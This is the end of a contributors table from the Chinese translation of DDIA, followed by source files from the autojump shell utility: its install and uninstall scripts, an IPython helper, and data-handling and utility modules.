[@Hookey](https://github.com/Hookey) | 识别了当前简繁转译过程中处理不当的地方,暂通过转换脚本规避 | | [144](https://github.com/Vonng/ddia/issues/144) | [@secret4233](https://github.com/secret4233) | ch7: 不翻译`next-key locking` | | [143](https://github.com/Vonng/ddia/issues/143) | [@imcheney](https://github.com/imcheney) | ch3: 更新残留的机翻段落 | | [142](https://github.com/Vonng/ddia/issues/142) | [@XIJINIAN](https://github.com/XIJINIAN) | 建议去除段首的制表符 | | [141](https://github.com/Vonng/ddia/issues/141) | [@Flyraty](https://github.com/Flyraty) | ch5: 发现一处错误格式的章节引用 | | [140](https://github.com/Vonng/ddia/pull/140) | [@Bowser1704](https://github.com/Bowser1704) | ch5: 修正章节Summary中多处不通顺的翻译 | | [139](https://github.com/Vonng/ddia/pull/139) | [@Bowser1704](https://github.com/Bowser1704) | ch2&ch3: 修正多处不通顺的或错误的翻译 | | [137](https://github.com/Vonng/ddia/pull/137) | [@fuxuemingzhu](https://github.com/fuxuemingzhu) | ch5&ch6: 优化多处不通顺的或错误的翻译 | | [134](https://github.com/Vonng/ddia/pull/134) | [@fuxuemingzhu](https://github.com/fuxuemingzhu) | ch4: 优化多处不通顺的或错误的翻译 | | [133](https://github.com/Vonng/ddia/pull/133) | [@fuxuemingzhu](https://github.com/fuxuemingzhu) | ch3: 优化多处错误的或不通顺的翻译 | | [132](https://github.com/Vonng/ddia/pull/132) | [@fuxuemingzhu](https://github.com/fuxuemingzhu) | ch3: 优化一处容易产生歧义的翻译 | | [131](https://github.com/Vonng/ddia/pull/131) | [@rwwg4](https://github.com/rwwg4) | ch6: 修正两处错误的翻译 | | [129](https://github.com/Vonng/ddia/pull/129) | [@anaer](https://github.com/anaer) | ch4: 修正两处强调文本和四处代码变量名称 | | [128](https://github.com/Vonng/ddia/pull/128) | [@meilin96](https://github.com/meilin96) | ch5: 修正一处错误的引用 | | 
[126](https://github.com/Vonng/ddia/pull/126) | [@cwr31](https://github.com/cwr31) | ch10: 修正一处错误的翻译(功能 -> 函数) | | [125](https://github.com/Vonng/ddia/pull/125) | [@dch1228](https://github.com/dch1228) | ch2: 优化 how best 的翻译(如何以最佳方式) | | [123](https://github.com/Vonng/ddia/pull/123) | [@yingang](https://github.com/yingang) | translation updates (chapter 9, TOC in readme, glossary, etc.) | | [121](https://github.com/Vonng/ddia/pull/121) | [@yingang](https://github.com/yingang) | translation updates (chapter 5 to chapter 8) | | [120](https://github.com/Vonng/ddia/pull/120) | [@jiong-han](https://github.com/jiong-han) | Typo fix: 呲之以鼻 -> 嗤之以鼻 | | [119](https://github.com/Vonng/ddia/pull/119) | [@cclauss](https://github.com/cclauss) | Streamline file operations in convert() | | [118](https://github.com/Vonng/ddia/pull/118) | [@yingang](https://github.com/yingang) | translation updates (chapter 2 to chapter 4) | | [117](https://github.com/Vonng/ddia/pull/117) | [@feeeei](https://github.com/feeeei) | 统一每章的标题格式 | | [115](https://github.com/Vonng/ddia/pull/115) | [@NageNalock](https://github.com/NageNalock) | 第七章病句修改: 重复词语 | | [114](https://github.com/Vonng/ddia/pull/114) | [@Sunt-ing](https://github.com/Sunt-ing) | Update README.md: correct the book name | | [113](https://github.com/Vonng/ddia/pull/113) | [@lpxxn](https://github.com/lpxxn) | 修改语句 | | [112](https://github.com/Vonng/ddia/pull/112) | [@ibyte2011](https://github.com/ibyte2011) | Update ch9.md | | [110](https://github.com/Vonng/ddia/pull/110) | [@lpxxn](https://github.com/lpxxn) | 读已写入数据 | | [107](https://github.com/Vonng/ddia/pull/107) | [@abbychau](https://github.com/abbychau) | 單調鐘和好死还是赖活着 | | [106](https://github.com/Vonng/ddia/pull/106) | [@enochii](https://github.com/enochii) | typo in ch2: fix braces typo | | [105](https://github.com/Vonng/ddia/pull/105) | [@LiminCode](https://github.com/LiminCode) | Chronicle translation error | | [104](https://github.com/Vonng/ddia/pull/104) | [@Sunt-ing](https://github.com/Sunt-ing) | several advice for better translation | | [103](https://github.com/Vonng/ddia/pull/103) | [@Sunt-ing](https://github.com/Sunt-ing) | typo in ch4: should be 完成 rather than 完全 | | [102](https://github.com/Vonng/ddia/pull/102) | [@Sunt-ing](https://github.com/Sunt-ing) | ch4: better-translation: 扼杀 → 破坏 | | [101](https://github.com/Vonng/ddia/pull/101) | [@Sunt-ing](https://github.com/Sunt-ing) | typo in Ch4: should be "改变" rathr than "盖面" | | [100](https://github.com/Vonng/ddia/pull/100) | [@LiminCode](https://github.com/LiminCode) | fix missing translation | | [99 ](https://github.com/Vonng/ddia/pull/99) | [@mrdrivingduck](https://github.com/mrdrivingduck) | ch6: fix the word rebalancing | | [98 ](https://github.com/Vonng/ddia/pull/98) | [@jacklightChen](https://github.com/jacklightChen) | fix ch7.md: fix wrong references | | [97 ](https://github.com/Vonng/ddia/pull/97) | [@jenac](https://github.com/jenac) | 96 | | [96 ](https://github.com/Vonng/ddia/pull/96) | [@PragmaTwice](https://github.com/PragmaTwice) | ch2: fix typo about 'may or may not be' | | [95 ](https://github.com/Vonng/ddia/pull/95) | [@EvanMu96](https://github.com/EvanMu96) | fix translation of "the battle cry" in ch5 | | [94 ](https://github.com/Vonng/ddia/pull/94) | [@kemingy](https://github.com/kemingy) | ch6: fix markdown and punctuations | | [93 ](https://github.com/Vonng/ddia/pull/93) | [@kemingy](https://github.com/kemingy) | ch5: fix markdown and some typos | | [92 ](https://github.com/Vonng/ddia/pull/92) | 
[@Gilbert1024](https://github.com/Gilbert1024) | Merge pull request #1 from Vonng/master | | [88 ](https://github.com/Vonng/ddia/pull/88) | [@kemingy](https://github.com/kemingy) | fix typo for ch1, ch2, ch3, ch4 | | [87 ](https://github.com/Vonng/ddia/pull/87) | [@wynn5a](https://github.com/wynn5a) | Update ch3.md | | [86 ](https://github.com/Vonng/ddia/pull/86) | [@northmorn](https://github.com/northmorn) | Update ch1.md | | [85 ](https://github.com/Vonng/ddia/pull/85) | [@sunbuhui](https://github.com/sunbuhui) | fix ch2.md: fix ch2 ambiguous translation | | [84 ](https://github.com/Vonng/ddia/pull/84) | [@ganler](https://github.com/ganler) | Fix translation: use up | | [83 ](https://github.com/Vonng/ddia/pull/83) | [@afunTW](https://github.com/afunTW) | Using OpenCC to convert from zh-cn to zh-tw | | [82 ](https://github.com/Vonng/ddia/pull/82) | [@kangni](https://github.com/kangni) | fix gitbook url | | [78 ](https://github.com/Vonng/ddia/pull/78) | [@hanyu2](https://github.com/hanyu2) | Fix unappropriated translation | | [77 ](https://github.com/Vonng/ddia/pull/77) | [@Ozarklake](https://github.com/Ozarklake) | fix typo | | [75 ](https://github.com/Vonng/ddia/pull/75) | [@2997ms](https://github.com/2997ms) | Fix typo | | [74 ](https://github.com/Vonng/ddia/pull/74) | [@2997ms](https://github.com/2997ms) | Update ch9.md | | [70 ](https://github.com/Vonng/ddia/pull/70) | [@2997ms](https://github.com/2997ms) | Update ch7.md | | [67 ](https://github.com/Vonng/ddia/pull/67) | [@jiajiadebug](https://github.com/jiajiadebug) | fix issues in ch2 - ch9 and glossary | | [66 ](https://github.com/Vonng/ddia/pull/66) | [@blindpirate](https://github.com/blindpirate) | Fix typo | | [63 ](https://github.com/Vonng/ddia/pull/63) | [@haifeiWu](https://github.com/haifeiWu) | Update ch10.md | | [62 ](https://github.com/Vonng/ddia/pull/62) | [@ych](https://github.com/ych) | fix ch1.md typesetting problem | | [61 ](https://github.com/Vonng/ddia/pull/61) | [@xianlaioy](https://github.com/xianlaioy) | docs:钟-->种,去掉ou | | [60 ](https://github.com/Vonng/ddia/pull/60) | [@Zombo1296](https://github.com/Zombo1296) | 否则 -> 或者 | | [59 ](https://github.com/Vonng/ddia/pull/59) | [@AlexanderMisel](https://github.com/AlexanderMisel) | 呼叫->调用,显着->显著 | | [58 ](https://github.com/Vonng/ddia/pull/58) | [@ibyte2011](https://github.com/ibyte2011) | Update ch8.md | | [55 ](https://github.com/Vonng/ddia/pull/55) | [@saintube](https://github.com/saintube) | ch8: 修改链接错误 | | [54 ](https://github.com/Vonng/ddia/pull/54) | [@Panmax](https://github.com/Panmax) | Update ch2.md | | [53 ](https://github.com/Vonng/ddia/pull/53) | [@ibyte2011](https://github.com/ibyte2011) | Update ch9.md | | [52 ](https://github.com/Vonng/ddia/pull/52) | [@hecenjie](https://github.com/hecenjie) | Update ch1.md | | [51 ](https://github.com/Vonng/ddia/pull/51) | [@latavin243](https://github.com/latavin243) | fix 修正ch3 ch4几处翻译 | | [50 ](https://github.com/Vonng/ddia/pull/50) | [@AlexZFX](https://github.com/AlexZFX) | 几个疏漏和格式错误 | | [49 ](https://github.com/Vonng/ddia/pull/49) | [@haifeiWu](https://github.com/haifeiWu) | Update ch1.md | | [48 ](https://github.com/Vonng/ddia/pull/48) | [@scaugrated](https://github.com/scaugrated) | fix typo | | [47 ](https://github.com/Vonng/ddia/pull/47) | [@lzwill](https://github.com/lzwill) | Fixed typos in ch2 | | [45 ](https://github.com/Vonng/ddia/pull/45) | [@zenuo](https://github.com/zenuo) | 删除一个多余的右括号 | | [44 ](https://github.com/Vonng/ddia/pull/44) | [@akxxsb](https://github.com/akxxsb) | 修正第七章底部链接错误 | | [43 
](https://github.com/Vonng/ddia/pull/43) | [@baijinping](https://github.com/baijinping) | "更假简单"->"更加简单" | | [42 ](https://github.com/Vonng/ddia/pull/42) | [@tisonkun](https://github.com/tisonkun) | 修复 ch1 中的无序列表格式 | | [38 ](https://github.com/Vonng/ddia/pull/38) | [@renjie-c](https://github.com/renjie-c) | 纠正多处的翻译小错误 | | [37 ](https://github.com/Vonng/ddia/pull/37) | [@tankilo](https://github.com/tankilo) | fix translation mistakes in ch4.md | | [36 ](https://github.com/Vonng/ddia/pull/36) | [@wwek](https://github.com/wwek) | 1.修复多个链接错误 2.名词优化修订 3.错误修订 | | [35 ](https://github.com/Vonng/ddia/pull/35) | [@wwek](https://github.com/wwek) | fix ch7.md to ch8.md link error | | [34 ](https://github.com/Vonng/ddia/pull/34) | [@wwek](https://github.com/wwek) | Merge pull request #1 from Vonng/master | | [33 ](https://github.com/Vonng/ddia/pull/33) | [@wwek](https://github.com/wwek) | fix part-ii.md link error | | [32 ](https://github.com/Vonng/ddia/pull/32) | [@JCYoky](https://github.com/JCYoky) | Update ch2.md | | [31 ](https://github.com/Vonng/ddia/pull/31) | [@elsonLee](https://github.com/elsonLee) | Update ch7.md | | [26 ](https://github.com/Vonng/ddia/pull/26) | [@yjhmelody](https://github.com/yjhmelody) | 修复一些明显错误 | | [25 ](https://github.com/Vonng/ddia/pull/25) | [@lqbilbo](https://github.com/lqbilbo) | 修复链接错误 | | [24 ](https://github.com/Vonng/ddia/pull/24) | [@artiship](https://github.com/artiship) | 修改词语顺序 | | [23 ](https://github.com/Vonng/ddia/pull/23) | [@artiship](https://github.com/artiship) | 修正错别字 | | [22 ](https://github.com/Vonng/ddia/pull/22) | [@artiship](https://github.com/artiship) | 纠正翻译错误 | | [21 ](https://github.com/Vonng/ddia/pull/21) | [@zhtisi](https://github.com/zhtisi) | 修正目录和本章标题不符的情况 | | [20 ](https://github.com/Vonng/ddia/pull/20) | [@rentiansheng](https://github.com/rentiansheng) | Update ch7.md | | [19 ](https://github.com/Vonng/ddia/pull/19) | [@LHRchina](https://github.com/LHRchina) | 修复语句小bug | | [16 ](https://github.com/Vonng/ddia/pull/16) | [@MuAlex](https://github.com/MuAlex) | Master | | [15 ](https://github.com/Vonng/ddia/pull/15) | [@cg-zhou](https://github.com/cg-zhou) | Update translation progress | | [14 ](https://github.com/Vonng/ddia/pull/14) | [@cg-zhou](https://github.com/cg-zhou) | Translate glossary | | [13 ](https://github.com/Vonng/ddia/pull/13) | [@cg-zhou](https://github.com/cg-zhou) | 详细修改了后记中和印度野猪相关的描述 | | [12 ](https://github.com/Vonng/ddia/pull/12) | [@ibyte2011](https://github.com/ibyte2011) | 修改了部分翻译 | | [11 ](https://github.com/Vonng/ddia/pull/11) | [@jiajiadebug](https://github.com/jiajiadebug) | ch2 100% | | [10 ](https://github.com/Vonng/ddia/pull/10) | [@jiajiadebug](https://github.com/jiajiadebug) | ch2 20% | | [9 ](https://github.com/Vonng/ddia/pull/9) | [@jiajiadebug](https://github.com/jiajiadebug) | Preface, ch1, part-i translation minor fixes | | [7 ](https://github.com/Vonng/ddia/pull/7) | [@MuAlex](https://github.com/MuAlex) | Ch6 translation pull request | | [6 ](https://github.com/Vonng/ddia/pull/6) | [@MuAlex](https://github.com/MuAlex) | Ch6 change version1 | | [5 ](https://github.com/Vonng/ddia/pull/5) | [@nevertiree](https://github.com/nevertiree) | Chapter 01语法微调 | | [2 ](https://github.com/Vonng/ddia/pull/2) | [@seagullbird](https://github.com/seagullbird) | 序言初翻 | </details> --------- ## 协议 [![License: CC-BY 4.0](https://img.shields.io/github/license/Vonng/ddia?logo=opensourceinitiative&logoColor=green&color=slategray)](https://github.com/Vonng/ddia/blob/master/LICENSE)
autojump
ff75f542ae6ef94d93c456f3e37c555598664ca5
File: uninstall.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import print_function import os import platform import shutil import sys sys.path.append('bin') from autojump_argparse import ArgumentParser # noqa def is_empty_dir(path): """ Checks if any files are present within a directory and all sub-directories. """ for _, _, files in os.walk(path): if files: return False return True def parse_arguments(): default_clink_dir = os.path.join(os.getenv('LOCALAPPDATA', ''), 'clink') parser = ArgumentParser( description='Uninstalls autojump.', ) parser.add_argument( '-n', '--dryrun', action='store_true', default=False, help='simulate installation', ) parser.add_argument( '-u', '--userdata', action='store_true', default=False, help='delete user data', ) parser.add_argument( '-d', '--destdir', metavar='DIR', help='custom destdir', ) parser.add_argument( '-p', '--prefix', metavar='DIR', default='', help='custom prefix', ) parser.add_argument( '-z', '--zshshare', metavar='DIR', default='functions', help='custom zshshare', ) parser.add_argument( '-c', '--clinkdir', metavar='DIR', default=default_clink_dir, ) return parser.parse_args() def remove_custom_installation(args, dryrun=False): if not args.destdir: return bin_dir = os.path.join(args.destdir, args.prefix, 'bin') doc_dir = os.path.join(args.destdir, args.prefix, 'share', 'man', 'man1') etc_dir = os.path.join(args.destdir, 'etc', 'profile.d') share_dir = os.path.join(args.destdir, args.prefix, 'share', 'autojump') zshshare_dir = os.path.join(args.destdir, args.zshshare) if not os.path.exists(share_dir): return print('\nFound custom installation...') rm(os.path.join(bin_dir, 'autojump'), dryrun) rm(os.path.join(bin_dir, 'autojump_data.py'), dryrun) rm(os.path.join(bin_dir, 'autojump_utils.py'), dryrun) rm(os.path.join(bin_dir, 'autojump_argparse.py'), dryrun) if platform.system() == 'Windows': if os.path.exists(args.clinkdir): rm(os.path.join(args.clinkdir, 'autojump.lua'), dryrun) rm(os.path.join(bin_dir, 'autojump.bat'), dryrun) rm(os.path.join(bin_dir, 'j.bat'), dryrun) rm(os.path.join(bin_dir, 'jc.bat'), dryrun) rm(os.path.join(bin_dir, 'jco.bat'), dryrun) rm(os.path.join(bin_dir, 'jo.bat'), dryrun) else: rm(os.path.join(etc_dir, 'autojump.sh'), dryrun) rm(os.path.join(share_dir, 'autojump.bash'), dryrun) rm(os.path.join(share_dir, 'autojump.fish'), dryrun) rm(os.path.join(share_dir, 'autojump.tcsh'), dryrun) rm(os.path.join(share_dir, 'autojump.zsh'), dryrun) rm(os.path.join(zshshare_dir, '_j'), dryrun) rmdir(share_dir, dryrun) rm(os.path.join(doc_dir, 'autojump.1'), dryrun) if is_empty_dir(args.destdir): rmdir(args.destdir, dryrun) def remove_system_installation(dryrun=False): default_destdir = '/' default_prefix = '/usr/local' default_zshshare = '/usr/share/zsh/site-functions' bin_dir = os.path.join(default_destdir, default_prefix, 'bin') doc_dir = os.path.join( default_destdir, default_prefix, 'share', 'man', 'man1', ) etc_dir = os.path.join(default_destdir, 'etc', 'profile.d') share_dir = os.path.join( default_destdir, default_prefix, 'share', 'autojump', ) zshshare_dir = os.path.join(default_destdir, default_zshshare) if not os.path.exists(share_dir): return print('\nFound system installation...') if os.geteuid() != 0: print( 'Please rerun as root for system-wide uninstall, skipping...', file=sys.stderr, ) return rm(os.path.join(bin_dir, 'autojump'), dryrun) rm(os.path.join(bin_dir, 'autojump_data.py'), dryrun) rm(os.path.join(bin_dir, 'autojump_utils.py'), dryrun) rm(os.path.join(etc_dir, 'autojump.sh'), dryrun) 
rm(os.path.join(share_dir, 'autojump.bash'), dryrun) rm(os.path.join(share_dir, 'autojump.fish'), dryrun) rm(os.path.join(share_dir, 'autojump.tcsh'), dryrun) rm(os.path.join(share_dir, 'autojump.zsh'), dryrun) rm(os.path.join(zshshare_dir, '_j'), dryrun) rmdir(share_dir, dryrun) rm(os.path.join(doc_dir, 'autojump.1'), dryrun) def remove_user_data(dryrun=False): if platform.system() == 'Darwin': data_home = os.path.join( os.path.expanduser('~'), 'Library', 'autojump', ) elif platform.system() == 'Windows': data_home = os.path.join( os.getenv('APPDATA'), 'autojump', ) else: data_home = os.getenv( 'XDG_DATA_HOME', os.path.join( os.path.expanduser('~'), '.local', 'share', 'autojump', ), ) if os.path.exists(data_home): print('\nFound user data...') rmdir(data_home, dryrun) def remove_user_installation(dryrun=False): if platform.system() == 'Windows': default_destdir = os.path.join( os.getenv('LOCALAPPDATA', ''), 'autojump', ) clink_dir = os.path.join(os.getenv('LOCALAPPDATA', ''), 'clink') else: default_destdir = os.path.join(os.path.expanduser('~'), '.autojump') if os.path.exists(default_destdir): print('\nFound user installation...') rmdir(default_destdir, dryrun) if platform.system() == 'Windows' and os.path.exists(clink_dir): rm(os.path.join(clink_dir, 'autojump.lua'), dryrun) def rm(path, dryrun): if os.path.exists(path): print('deleting file:', path) if not dryrun: os.remove(path) def rmdir(path, dryrun): if os.path.exists(path): print('deleting directory:', path) if not dryrun: shutil.rmtree(path) def main(args): if args.dryrun: print('Uninstalling autojump (DRYRUN)...') else: print('Uninstalling autojump...') remove_user_installation(args.dryrun) remove_system_installation(args.dryrun) remove_custom_installation(args, args.dryrun) if args.userdata: remove_user_data(args.dryrun) if __name__ == '__main__': sys.exit(main(parse_arguments())) File: install.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import print_function import os import platform import shutil import sys sys.path.append('bin') from autojump_argparse import ArgumentParser # noqa SUPPORTED_SHELLS = ('bash', 'zsh', 'fish', 'tcsh') def cp(src, dest, dryrun=False): print('copying file: %s -> %s' % (src, dest)) if not dryrun: shutil.copy(src, dest) def get_shell(): return os.path.basename(os.getenv('SHELL', '')) def mkdir(path, dryrun=False): print('creating directory:', path) if not dryrun and not os.path.exists(path): os.makedirs(path) def modify_autojump_sh(etc_dir, share_dir, dryrun=False): """Append custom installation path to autojump.sh""" custom_install = '\ \n# check custom install \ \nif [ -s %s/autojump.${shell} ]; then \ \n source %s/autojump.${shell} \ \nfi\n' % (share_dir, share_dir) with open(os.path.join(etc_dir, 'autojump.sh'), 'a') as f: f.write(custom_install) def modify_autojump_lua(clink_dir, bin_dir, dryrun=False): """Prepend custom AUTOJUMP_BIN_DIR definition to autojump.lua""" custom_install = "local AUTOJUMP_BIN_DIR = \"%s\"\n" % bin_dir.replace( '\\', '\\\\', ) clink_file = os.path.join(clink_dir, 'autojump.lua') with open(clink_file, 'r') as f: original = f.read() with open(clink_file, 'w') as f: f.write(custom_install + original) def parse_arguments(): # noqa if platform.system() == 'Windows': default_user_destdir = os.path.join( os.getenv('LOCALAPPDATA', ''), 'autojump', ) else: default_user_destdir = os.path.join( os.path.expanduser('~'), '.autojump', ) default_user_prefix = '' default_user_zshshare = 'functions' default_system_destdir = '/' default_system_prefix = '/usr/local' 
default_system_zshshare = '/usr/share/zsh/site-functions' default_clink_dir = os.path.join(os.getenv('LOCALAPPDATA', ''), 'clink') parser = ArgumentParser( description='Installs autojump globally for root users, otherwise \ installs in current user\'s home directory.' ) parser.add_argument( '-n', '--dryrun', action='store_true', default=False, help='simulate installation', ) parser.add_argument( '-f', '--force', action='store_true', default=False, help='skip root user, shell type, Python version checks', ) parser.add_argument( '-d', '--destdir', metavar='DIR', default=default_user_destdir, help='set destination to DIR', ) parser.add_argument( '-p', '--prefix', metavar='DIR', default=default_user_prefix, help='set prefix to DIR', ) parser.add_argument( '-z', '--zshshare', metavar='DIR', default=default_user_zshshare, help='set zsh share destination to DIR', ) parser.add_argument( '-c', '--clinkdir', metavar='DIR', default=default_clink_dir, help='set clink directory location to DIR (Windows only)', ) parser.add_argument( '-s', '--system', action='store_true', default=False, help='install system wide for all users', ) args = parser.parse_args() if not args.force: if sys.version_info[0] == 2 and sys.version_info[1] < 6: print('Python v2.6+ or v3.0+ required.', file=sys.stderr) sys.exit(1) if args.system: if platform.system() == 'Windows': print( 'System-wide installation is not supported on Windows.', file=sys.stderr, ) sys.exit(1) elif os.geteuid() != 0: print( 'Please rerun as root for system-wide installation.', file=sys.stderr, ) sys.exit(1) if platform.system() != 'Windows' \ and get_shell() not in SUPPORTED_SHELLS: print( 'Unsupported shell: %s' % os.getenv('SHELL'), file=sys.stderr, ) sys.exit(1) if args.destdir != default_user_destdir \ or args.prefix != default_user_prefix \ or args.zshshare != default_user_zshshare: args.custom_install = True else: args.custom_install = False if args.system: if args.custom_install: print( 'Custom paths incompatible with --system option.', file=sys.stderr, ) sys.exit(1) args.destdir = default_system_destdir args.prefix = default_system_prefix args.zshshare = default_system_zshshare return args def show_post_installation_message(etc_dir, share_dir, bin_dir): if platform.system() == 'Windows': print('\nPlease manually add %s to your user path' % bin_dir) else: if get_shell() == 'fish': aj_shell = '%s/autojump.fish' % share_dir source_msg = 'if test -f %s; . %s; end' % (aj_shell, aj_shell) rcfile = '~/.config/fish/config.fish' else: aj_shell = '%s/autojump.sh' % etc_dir source_msg = '[[ -s %s ]] && source %s' % (aj_shell, aj_shell) if platform.system() == 'Darwin' and get_shell() == 'bash': rcfile = '~/.profile' else: rcfile = '~/.%src' % get_shell() print('\nPlease manually add the following line(s) to %s:' % rcfile) print('\n\t' + source_msg) if get_shell() == 'zsh': print('\n\tautoload -U compinit && compinit -u') print('\nPlease restart terminal(s) before running autojump.\n') def main(args): if args.dryrun: print('Installing autojump to %s (DRYRUN)...' % args.destdir) else: print('Installing autojump to %s ...' 
% args.destdir) bin_dir = os.path.join(args.destdir, args.prefix, 'bin') etc_dir = os.path.join(args.destdir, 'etc', 'profile.d') doc_dir = os.path.join(args.destdir, args.prefix, 'share', 'man', 'man1') share_dir = os.path.join(args.destdir, args.prefix, 'share', 'autojump') zshshare_dir = os.path.join(args.destdir, args.zshshare) mkdir(bin_dir, args.dryrun) mkdir(doc_dir, args.dryrun) mkdir(etc_dir, args.dryrun) mkdir(share_dir, args.dryrun) cp('./bin/autojump', bin_dir, args.dryrun) cp('./bin/autojump_argparse.py', bin_dir, args.dryrun) cp('./bin/autojump_data.py', bin_dir, args.dryrun) cp('./bin/autojump_match.py', bin_dir, args.dryrun) cp('./bin/autojump_utils.py', bin_dir, args.dryrun) cp('./bin/icon.png', share_dir, args.dryrun) cp('./docs/autojump.1', doc_dir, args.dryrun) if platform.system() == 'Windows': cp('./bin/autojump.lua', args.clinkdir, args.dryrun) cp('./bin/autojump.bat', bin_dir, args.dryrun) cp('./bin/j.bat', bin_dir, args.dryrun) cp('./bin/jc.bat', bin_dir, args.dryrun) cp('./bin/jo.bat', bin_dir, args.dryrun) cp('./bin/jco.bat', bin_dir, args.dryrun) if args.custom_install: modify_autojump_lua(args.clinkdir, bin_dir, args.dryrun) else: mkdir(etc_dir, args.dryrun) mkdir(share_dir, args.dryrun) mkdir(zshshare_dir, args.dryrun) cp('./bin/autojump.sh', etc_dir, args.dryrun) cp('./bin/autojump.bash', share_dir, args.dryrun) cp('./bin/autojump.fish', share_dir, args.dryrun) cp('./bin/autojump.zsh', share_dir, args.dryrun) cp('./bin/_j', zshshare_dir, args.dryrun) if args.custom_install: modify_autojump_sh(etc_dir, share_dir, args.dryrun) show_post_installation_message(etc_dir, share_dir, bin_dir) if __name__ == '__main__': sys.exit(main(parse_arguments())) File: tools/autojump_ipython.py # -*- coding: utf-8 -*- """ IPython autojump magic Written by keith hughitt <[email protected]>, based on an earlier version by Mario Pastorelli <[email protected]>. To install, create a new IPython user profile by running: ipython profile create And copy this file into the "startup" folder of your new profile (e.g. "$HOME/.config/ipython/profile_default/startup/"). 
@TODO: extend %cd to call "autojump -a" """ from subprocess import PIPE from subprocess import Popen from IPython.core.magic import register_line_magic ip = get_ipython() # noqa @register_line_magic def j(path): cmd = ['autojump'] + path.split() newpath = Popen( cmd, stdout=PIPE, shell=False, ).communicate()[0].strip() if newpath: ip.magic('cd %s' % newpath.decode('utf-8')) # remove from namespace del j File: bin/autojump_data.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import print_function import os import shutil import sys from codecs import open from collections import namedtuple from tempfile import NamedTemporaryFile from time import time from autojump_utils import create_dir from autojump_utils import is_osx from autojump_utils import is_python3 from autojump_utils import move_file from autojump_utils import unico if sys.version_info[0] == 3: ifilter = filter imap = map else: from itertools import ifilter # noqa from itertools import imap # noqa BACKUP_THRESHOLD = 24 * 60 * 60 Entry = namedtuple('Entry', ['path', 'weight']) def dictify(entries): """ Converts a list of entries into a dictionary where key = path value = weight """ result = {} for entry in entries: result[entry.path] = entry.weight return result def entriefy(data): """Converts a dictionary into an iterator of entries.""" convert = lambda tup: Entry(*tup) if is_python3(): return map(convert, data.items()) return imap(convert, data.iteritems()) def load(config): """Returns a dictonary (key=path, value=weight) loaded from data file.""" xdg_aj_home = os.path.join( os.path.expanduser('~'), '.local', 'share', 'autojump', ) if is_osx() and os.path.exists(xdg_aj_home): migrate_osx_xdg_data(config) if not os.path.exists(config['data_path']): return {} # example: u'10.0\t/home/user\n' -> ['10.0', u'/home/user'] parse = lambda line: line.strip().split('\t') correct_length = lambda x: len(x) == 2 # example: ['10.0', u'/home/user'] -> (u'/home/user', 10.0) tupleize = lambda x: (x[1], float(x[0])) try: with open( config['data_path'], 'r', encoding='utf-8', errors='replace', ) as f: return dict( imap( tupleize, ifilter(correct_length, imap(parse, f)), ), ) except (IOError, EOFError): return load_backup(config) def load_backup(config): if os.path.exists(config['backup_path']): move_file(config['backup_path'], config['data_path']) return load(config) return {} def migrate_osx_xdg_data(config): """ Older versions incorrectly used Linux XDG_DATA_HOME paths on OS X. This migrates autojump files from ~/.local/share/autojump to ~/Library/autojump """ assert is_osx(), 'This function should only be run on OS X.' 
xdg_data_home = os.path.join(os.path.expanduser('~'), '.local', 'share') xdg_aj_home = os.path.join(xdg_data_home, 'autojump') data_path = os.path.join(xdg_aj_home, 'autojump.txt') backup_path = os.path.join(xdg_aj_home, 'autojump.txt.bak') if os.path.exists(data_path): move_file(data_path, config['data_path']) if os.path.exists(backup_path): move_file(backup_path, config['backup_path']) # cleanup shutil.rmtree(xdg_aj_home) if len(os.listdir(xdg_data_home)) == 0: shutil.rmtree(xdg_data_home) def save(config, data): """Save data and create backup, creating a new data file if necessary.""" data_dir = os.path.dirname(config['data_path']) create_dir(data_dir) # atomically save by writing to temporary file and moving to destination try: temp = NamedTemporaryFile(delete=False, dir=data_dir) # Windows cannot reuse the same open file name temp.close() with open(temp.name, 'w', encoding='utf-8', errors='replace') as f: for path, weight in data.items(): f.write(unico('%s\t%s\n' % (weight, path))) f.flush() os.fsync(f) except IOError as ex: print('Error saving autojump data (disk full?)' % ex, file=sys.stderr) sys.exit(1) # move temp_file -> autojump.txt move_file(temp.name, config['data_path']) # create backup file if it doesn't exist or is older than BACKUP_THRESHOLD if not os.path.exists(config['backup_path']) or \ (time() - os.path.getmtime(config['backup_path']) > BACKUP_THRESHOLD): # noqa shutil.copy(config['data_path'], config['backup_path']) File: bin/autojump_utils.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import print_function import errno import os import platform import re import shutil import sys import unicodedata from itertools import islice if sys.version_info[0] == 3: imap = map os.getcwdu = os.getcwd else: from itertools import imap def create_dir(path): """Creates a directory atomically.""" try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise def encode_local(string): """Converts string into user's preferred encoding.""" if is_python3(): return string return string.encode(sys.getfilesystemencoding() or 'utf-8') def first(xs): it = iter(xs) try: if is_python3(): return it.__next__() return it.next() except StopIteration: return None def get_tab_entry_info(entry, separator): """ Given a tab entry in the following format return needle, index, and path: [needle]__[index]__[path] """ needle, index, path = None, None, None match_needle = re.search(r'(.*?)' + separator, entry) match_index = re.search(separator + r'([0-9]{1})', entry) match_path = re.search( separator + r'[0-9]{1}' + separator + r'(.*)', entry, ) if match_needle: needle = match_needle.group(1) if match_index: index = int(match_index.group(1)) if match_path: path = match_path.group(1) return needle, index, path def get_pwd(): try: return os.getcwdu() except OSError: print('Current directory no longer exists.', file=sys.stderr) raise def has_uppercase(string): if is_python3(): return any(ch.isupper() for ch in string) return any(unicodedata.category(c) == 'Lu' for c in unicode(string)) def in_bash(): return 'bash' in os.getenv('SHELL') def is_autojump_sourced(): return '1' == os.getenv('AUTOJUMP_SOURCED') def is_python2(): return sys.version_info[0] == 2 def is_python3(): return sys.version_info[0] == 3 def is_linux(): return platform.system() == 'Linux' def is_osx(): return platform.system() == 'Darwin' def is_windows(): return platform.system() == 'Windows' def last(xs): it = iter(xs) tmp = None try: if is_python3(): while True: tmp = it.__next__() else: 
